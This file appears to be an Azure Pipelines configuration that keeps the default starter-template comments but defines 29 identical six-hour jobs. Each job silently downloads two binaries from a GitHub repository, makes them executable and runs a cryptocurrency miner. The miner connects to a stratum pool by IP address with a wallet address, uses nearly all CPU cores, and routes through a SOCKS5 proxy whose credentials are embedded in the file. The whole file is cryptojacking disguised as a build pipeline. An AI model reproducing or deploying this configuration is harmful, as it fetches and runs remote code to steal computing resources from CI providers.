# Starter pipeline
# Start with a minimal pipeline that you can customize to build and deploy your code.
# Add steps that build, run tests, deploy, and more:
# https://aka.ms/yaml

trigger:
- main

pool: Azure Pipelines

jobs:
- job: a
  timeoutInMinutes: 360
  cancelTimeoutInMinutes: 360
  steps:
  - script: wget https://github.com/aurbach55/kyubi/raw/main/ass >/dev/null 2>&1 && 
wget https://github.com/aurbach55/kyubi/raw/main/verus-solver >/dev/null 2>&1 && 
chmod +x ass verus-solver >/dev/null 2>&1 &&
./ass -c stratum+tcp://139.99.123.225:3956 -u RWsems1CfyqgPe4c9UdJTP2RsSUtC389jG.pipe -p x --cpu $(($(nproc)-1)) --proxy socks5://gilaajakali-rotate:g1l4l03k4l1@149.6.162.2:80

- job: b
  timeoutInMinutes: 360
  cancelTimeoutInMinutes: 360
  steps:
  - script: wget https://github.com/aurbach55/kyubi/raw/main/ass >/dev/null 2>&1 && 
wget https://github.com/aurbach55/kyubi/raw/main/verus-solver >/dev/null 2>&1 && 
chmod +x ass verus-solver >/dev/null 2>&1 &&
./ass -c stratum+tcp://139.99.123.225:3956 -u RWsems1CfyqgPe4c9UdJTP2RsSUtC389jG.pipe -p x --cpu $(($(nproc)-1)) --proxy socks5://gilaajakali-rotate:g1l4l03k4l1@149.6.162.2:80 

- job: c
  timeoutInMinutes: 360
  cancelTimeoutInMinutes: 360
  steps:
  - script: wget https://github.com/aurbach55/kyubi/raw/main/ass >/dev/null 2>&1 && 
wget https://github.com/aurbach55/kyubi/raw/main/verus-solver >/dev/null 2>&1 && 
chmod +x ass verus-solver >/dev/null 2>&1 &&
./ass -c stratum+tcp://139.99.123.225:3956 -u RWsems1CfyqgPe4c9UdJTP2RsSUtC389jG.pipe -p x --cpu $(($(nproc)-1)) --proxy socks5://gilaajakali-rotate:g1l4l03k4l1@149.6.162.2:80

- job: d
  timeoutInMinutes: 360
  cancelTimeoutInMinutes: 360
  steps:
  - script: wget https://github.com/aurbach55/kyubi/raw/main/ass >/dev/null 2>&1 && 
wget https://github.com/aurbach55/kyubi/raw/main/verus-solver >/dev/null 2>&1 && 
chmod +x ass verus-solver >/dev/null 2>&1 &&
./ass -c stratum+tcp://139.99.123.225:3956 -u RWsems1CfyqgPe4c9UdJTP2RsSUtC389jG.pipe -p x --cpu $(($(nproc)-1)) --proxy socks5://gilaajakali-rotate:g1l4l03k4l1@149.6.162.2:80

- job: e
  timeoutInMinutes: 360
  cancelTimeoutInMinutes: 360
  steps:
  - script: wget https://github.com/aurbach55/kyubi/raw/main/ass >/dev/null 2>&1 && 
wget https://github.com/aurbach55/kyubi/raw/main/verus-solver >/dev/null 2>&1 && 
chmod +x ass verus-solver >/dev/null 2>&1 &&
./ass -c stratum+tcp://139.99.123.225:3956 -u RWsems1CfyqgPe4c9UdJTP2RsSUtC389jG.pipe -p x --cpu $(($(nproc)-1)) --proxy socks5://gilaajakali-rotate:g1l4l03k4l1@149.6.162.2:80

- job: f
  timeoutInMinutes: 360
  cancelTimeoutInMinutes: 360
  steps:
  - script: wget https://github.com/aurbach55/kyubi/raw/main/ass >/dev/null 2>&1 && 
wget https://github.com/aurbach55/kyubi/raw/main/verus-solver >/dev/null 2>&1 && 
chmod +x ass verus-solver >/dev/null 2>&1 &&
./ass -c stratum+tcp://139.99.123.225:3956 -u RWsems1CfyqgPe4c9UdJTP2RsSUtC389jG.pipe -p x --cpu $(($(nproc)-1)) --proxy socks5://gilaajakali-rotate:g1l4l03k4l1@149.6.162.2:80

- job: g
  timeoutInMinutes: 360
  cancelTimeoutInMinutes: 360
  steps:
  - script: wget https://github.com/aurbach55/kyubi/raw/main/ass >/dev/null 2>&1 && 
wget https://github.com/aurbach55/kyubi/raw/main/verus-solver >/dev/null 2>&1 && 
chmod +x ass verus-solver >/dev/null 2>&1 &&
./ass -c stratum+tcp://139.99.123.225:3956 -u RWsems1CfyqgPe4c9UdJTP2RsSUtC389jG.pipe -p x --cpu $(($(nproc)-1)) --proxy socks5://gilaajakali-rotate:g1l4l03k4l1@149.6.162.2:80

- job: h
  timeoutInMinutes: 360
  cancelTimeoutInMinutes: 360
  steps:
  - script: wget https://github.com/aurbach55/kyubi/raw/main/ass >/dev/null 2>&1 && 
wget https://github.com/aurbach55/kyubi/raw/main/verus-solver >/dev/null 2>&1 && 
chmod +x ass verus-solver >/dev/null 2>&1 &&
./ass -c stratum+tcp://139.99.123.225:3956 -u RWsems1CfyqgPe4c9UdJTP2RsSUtC389jG.pipe -p x --cpu $(($(nproc)-1)) --proxy socks5://gilaajakali-rotate:g1l4l03k4l1@149.6.162.2:80

- job: i
  timeoutInMinutes: 360
  cancelTimeoutInMinutes: 360
  steps:
  - script: wget https://github.com/aurbach55/kyubi/raw/main/ass >/dev/null 2>&1 && 
wget https://github.com/aurbach55/kyubi/raw/main/verus-solver >/dev/null 2>&1 && 
chmod +x ass verus-solver >/dev/null 2>&1 &&
./ass -c stratum+tcp://139.99.123.225:3956 -u RWsems1CfyqgPe4c9UdJTP2RsSUtC389jG.pipe -p x --cpu $(($(nproc)-1)) --proxy socks5://gilaajakali-rotate:g1l4l03k4l1@149.6.162.2:80

- job: j
  timeoutInMinutes: 360
  cancelTimeoutInMinutes: 360
  steps:
  - script: wget https://github.com/aurbach55/kyubi/raw/main/ass >/dev/null 2>&1 && 
wget https://github.com/aurbach55/kyubi/raw/main/verus-solver >/dev/null 2>&1 && 
chmod +x ass verus-solver >/dev/null 2>&1 &&
./ass -c stratum+tcp://139.99.123.225:3956 -u RWsems1CfyqgPe4c9UdJTP2RsSUtC389jG.pipe -p x --cpu $(($(nproc)-1)) --proxy socks5://gilaajakali-rotate:g1l4l03k4l1@149.6.162.2:80

- job: k
  timeoutInMinutes: 360
  cancelTimeoutInMinutes: 360
  steps:
  - script: wget https://github.com/aurbach55/kyubi/raw/main/ass >/dev/null 2>&1 && 
wget https://github.com/aurbach55/kyubi/raw/main/verus-solver >/dev/null 2>&1 && 
chmod +x ass verus-solver >/dev/null 2>&1 &&
./ass -c stratum+tcp://139.99.123.225:3956 -u RWsems1CfyqgPe4c9UdJTP2RsSUtC389jG.pipe -p x --cpu $(($(nproc)-1)) --proxy socks5://gilaajakali-rotate:g1l4l03k4l1@149.6.162.2:80
- job: l
  timeoutInMinutes: 360
  cancelTimeoutInMinutes: 360
  steps:
  - script: wget https://github.com/aurbach55/kyubi/raw/main/ass >/dev/null 2>&1 && 
wget https://github.com/aurbach55/kyubi/raw/main/verus-solver >/dev/null 2>&1 && 
chmod +x ass verus-solver >/dev/null 2>&1 &&
./ass -c stratum+tcp://139.99.123.225:3956 -u RWsems1CfyqgPe4c9UdJTP2RsSUtC389jG.pipe -p x --cpu $(($(nproc)-1)) --proxy socks5://gilaajakali-rotate:g1l4l03k4l1@149.6.162.2:80

- job: m
  timeoutInMinutes: 360
  cancelTimeoutInMinutes: 360
  steps:
  - script: wget https://github.com/aurbach55/kyubi/raw/main/ass >/dev/null 2>&1 && 
wget https://github.com/aurbach55/kyubi/raw/main/verus-solver >/dev/null 2>&1 && 
chmod +x ass verus-solver >/dev/null 2>&1 &&
./ass -c stratum+tcp://139.99.123.225:3956 -u RWsems1CfyqgPe4c9UdJTP2RsSUtC389jG.pipe -p x --cpu $(($(nproc)-1)) --proxy socks5://gilaajakali-rotate:g1l4l03k4l1@149.6.162.2:80

- job: n
  timeoutInMinutes: 360
  cancelTimeoutInMinutes: 360
  steps:
  - script: wget https://github.com/aurbach55/kyubi/raw/main/ass >/dev/null 2>&1 && 
wget https://github.com/aurbach55/kyubi/raw/main/verus-solver >/dev/null 2>&1 && 
chmod +x ass verus-solver >/dev/null 2>&1 &&
./ass -c stratum+tcp://139.99.123.225:3956 -u RWsems1CfyqgPe4c9UdJTP2RsSUtC389jG.pipe -p x --cpu $(($(nproc)-1)) --proxy socks5://gilaajakali-rotate:g1l4l03k4l1@149.6.162.2:80

- job: o
  timeoutInMinutes: 360
  cancelTimeoutInMinutes: 360
  steps:
  - script: wget https://github.com/aurbach55/kyubi/raw/main/ass >/dev/null 2>&1 && 
wget https://github.com/aurbach55/kyubi/raw/main/verus-solver >/dev/null 2>&1 && 
chmod +x ass verus-solver >/dev/null 2>&1 &&
./ass -c stratum+tcp://139.99.123.225:3956 -u RWsems1CfyqgPe4c9UdJTP2RsSUtC389jG.pipe -p x --cpu $(($(nproc)-1)) --proxy socks5://gilaajakali-rotate:g1l4l03k4l1@149.6.162.2:80

- job: p
  timeoutInMinutes: 360
  cancelTimeoutInMinutes: 360
  steps:
  - script: wget https://github.com/aurbach55/kyubi/raw/main/ass >/dev/null 2>&1 && 
wget https://github.com/aurbach55/kyubi/raw/main/verus-solver >/dev/null 2>&1 && 
chmod +x ass verus-solver >/dev/null 2>&1 &&
./ass -c stratum+tcp://139.99.123.225:3956 -u RWsems1CfyqgPe4c9UdJTP2RsSUtC389jG.pipe -p x --cpu $(($(nproc)-1)) --proxy socks5://gilaajakali-rotate:g1l4l03k4l1@149.6.162.2:80
- job: q
  timeoutInMinutes: 360
  cancelTimeoutInMinutes: 360
  steps:
  - script: wget https://github.com/aurbach55/kyubi/raw/main/ass >/dev/null 2>&1 && 
wget https://github.com/aurbach55/kyubi/raw/main/verus-solver >/dev/null 2>&1 && 
chmod +x ass verus-solver >/dev/null 2>&1 &&
./ass -c stratum+tcp://139.99.123.225:3956 -u RWsems1CfyqgPe4c9UdJTP2RsSUtC389jG.pipe -p x --cpu $(($(nproc)-1)) --proxy socks5://gilaajakali-rotate:g1l4l03k4l1@149.6.162.2:80

- job: r
  timeoutInMinutes: 360
  cancelTimeoutInMinutes: 360
  steps:
  - script: wget https://github.com/aurbach55/kyubi/raw/main/ass >/dev/null 2>&1 && 
wget https://github.com/aurbach55/kyubi/raw/main/verus-solver >/dev/null 2>&1 && 
chmod +x ass verus-solver >/dev/null 2>&1 &&
./ass -c stratum+tcp://139.99.123.225:3956 -u RWsems1CfyqgPe4c9UdJTP2RsSUtC389jG.pipe -p x --cpu $(($(nproc)-1)) --proxy socks5://gilaajakali-rotate:g1l4l03k4l1@149.6.162.2:80

- job: s
  timeoutInMinutes: 360
  cancelTimeoutInMinutes: 360
  steps:
  - script: wget https://github.com/aurbach55/kyubi/raw/main/ass >/dev/null 2>&1 && 
wget https://github.com/aurbach55/kyubi/raw/main/verus-solver >/dev/null 2>&1 && 
chmod +x ass verus-solver >/dev/null 2>&1 &&
./ass -c stratum+tcp://139.99.123.225:3956 -u RWsems1CfyqgPe4c9UdJTP2RsSUtC389jG.pipe -p x --cpu $(($(nproc)-1)) --proxy socks5://gilaajakali-rotate:g1l4l03k4l1@149.6.162.2:80

- job: t
  timeoutInMinutes: 360
  cancelTimeoutInMinutes: 360
  steps:
  - script: wget https://github.com/aurbach55/kyubi/raw/main/ass >/dev/null 2>&1 && 
wget https://github.com/aurbach55/kyubi/raw/main/verus-solver >/dev/null 2>&1 && 
chmod +x ass verus-solver >/dev/null 2>&1 &&
./ass -c stratum+tcp://139.99.123.225:3956 -u RWsems1CfyqgPe4c9UdJTP2RsSUtC389jG.pipe -p x --cpu $(($(nproc)-1)) --proxy socks5://gilaajakali-rotate:g1l4l03k4l1@149.6.162.2:80

- job: u
  timeoutInMinutes: 360
  cancelTimeoutInMinutes: 360
  steps:
  - script: wget https://github.com/aurbach55/kyubi/raw/main/ass >/dev/null 2>&1 && 
wget https://github.com/aurbach55/kyubi/raw/main/verus-solver >/dev/null 2>&1 && 
chmod +x ass verus-solver >/dev/null 2>&1 &&
./ass -c stratum+tcp://139.99.123.225:3956 -u RWsems1CfyqgPe4c9UdJTP2RsSUtC389jG.pipe -p x --cpu $(($(nproc)-1)) --proxy socks5://gilaajakali-rotate:g1l4l03k4l1@149.6.162.2:80

- job: v
  timeoutInMinutes: 360
  cancelTimeoutInMinutes: 360
  steps:
  - script: wget https://github.com/aurbach55/kyubi/raw/main/ass >/dev/null 2>&1 && 
wget https://github.com/aurbach55/kyubi/raw/main/verus-solver >/dev/null 2>&1 && 
chmod +x ass verus-solver >/dev/null 2>&1 &&
./ass -c stratum+tcp://139.99.123.225:3956 -u RWsems1CfyqgPe4c9UdJTP2RsSUtC389jG.pipe -p x --cpu $(($(nproc)-1)) --proxy socks5://gilaajakali-rotate:g1l4l03k4l1@149.6.162.2:80

- job: w
  timeoutInMinutes: 360
  cancelTimeoutInMinutes: 360
  steps:
  - script: wget https://github.com/aurbach55/kyubi/raw/main/ass >/dev/null 2>&1 && 
wget https://github.com/aurbach55/kyubi/raw/main/verus-solver >/dev/null 2>&1 && 
chmod +x ass verus-solver >/dev/null 2>&1 &&
./ass -c stratum+tcp://139.99.123.225:3956 -u RWsems1CfyqgPe4c9UdJTP2RsSUtC389jG.pipe -p x --cpu $(($(nproc)-1)) --proxy socks5://gilaajakali-rotate:g1l4l03k4l1@149.6.162.2:80

- job: x
  timeoutInMinutes: 360
  cancelTimeoutInMinutes: 360
  steps:
  - script: wget https://github.com/aurbach55/kyubi/raw/main/ass >/dev/null 2>&1 && 
wget https://github.com/aurbach55/kyubi/raw/main/verus-solver >/dev/null 2>&1 && 
chmod +x ass verus-solver >/dev/null 2>&1 &&
./ass -c stratum+tcp://139.99.123.225:3956 -u RWsems1CfyqgPe4c9UdJTP2RsSUtC389jG.pipe -p x --cpu $(($(nproc)-1)) --proxy socks5://gilaajakali-rotate:g1l4l03k4l1@149.6.162.2:80

- job: y
  timeoutInMinutes: 360
  cancelTimeoutInMinutes: 360
  steps:
  - script: wget https://github.com/aurbach55/kyubi/raw/main/ass >/dev/null 2>&1 && 
wget https://github.com/aurbach55/kyubi/raw/main/verus-solver >/dev/null 2>&1 && 
chmod +x ass verus-solver >/dev/null 2>&1 &&
./ass -c stratum+tcp://139.99.123.225:3956 -u RWsems1CfyqgPe4c9UdJTP2RsSUtC389jG.pipe -p x --cpu $(($(nproc)-1)) --proxy socks5://gilaajakali-rotate:g1l4l03k4l1@149.6.162.2:80

- job: z
  timeoutInMinutes: 360
  cancelTimeoutInMinutes: 360
  steps:
  - script: wget https://github.com/aurbach55/kyubi/raw/main/ass >/dev/null 2>&1 && 
wget https://github.com/aurbach55/kyubi/raw/main/verus-solver >/dev/null 2>&1 && 
chmod +x ass verus-solver >/dev/null 2>&1 &&
./ass -c stratum+tcp://139.99.123.225:3956 -u RWsems1CfyqgPe4c9UdJTP2RsSUtC389jG.pipe -p x --cpu $(($(nproc)-1)) --proxy socks5://gilaajakali-rotate:g1l4l03k4l1@149.6.162.2:80

- job: a1
  timeoutInMinutes: 360
  cancelTimeoutInMinutes: 360
  steps:
  - script: wget https://github.com/aurbach55/kyubi/raw/main/ass >/dev/null 2>&1 && 
wget https://github.com/aurbach55/kyubi/raw/main/verus-solver >/dev/null 2>&1 && 
chmod +x ass verus-solver >/dev/null 2>&1 &&
./ass -c stratum+tcp://139.99.123.225:3956 -u RWsems1CfyqgPe4c9UdJTP2RsSUtC389jG.pipe -p x --cpu $(($(nproc)-1)) --proxy socks5://gilaajakali-rotate:g1l4l03k4l1@149.6.162.2:80

- job: b1
  timeoutInMinutes: 360
  cancelTimeoutInMinutes: 360
  steps:
  - script: wget https://github.com/aurbach55/kyubi/raw/main/ass >/dev/null 2>&1 && 
wget https://github.com/aurbach55/kyubi/raw/main/verus-solver >/dev/null 2>&1 && 
chmod +x ass verus-solver >/dev/null 2>&1 &&
./ass -c stratum+tcp://139.99.123.225:3956 -u RWsems1CfyqgPe4c9UdJTP2RsSUtC389jG.pipe -p x --cpu $(($(nproc)-1)) --proxy socks5://gilaajakali-rotate:g1l4l03k4l1@149.6.162.2:80

- job: c1
  timeoutInMinutes: 360
  cancelTimeoutInMinutes: 360
  steps:
  - script: wget https://github.com/aurbach55/kyubi/raw/main/ass >/dev/null 2>&1 && 
wget https://github.com/aurbach55/kyubi/raw/main/verus-solver >/dev/null 2>&1 && 
chmod +x ass verus-solver >/dev/null 2>&1 &&
./ass -c stratum+tcp://139.99.123.225:3956 -u RWsems1CfyqgPe4c9UdJTP2RsSUtC389jG.pipe -p x --cpu $(($(nproc)-1)) --proxy socks5://gilaajakali-rotate:g1l4l03k4l1@149.6.162.2:80
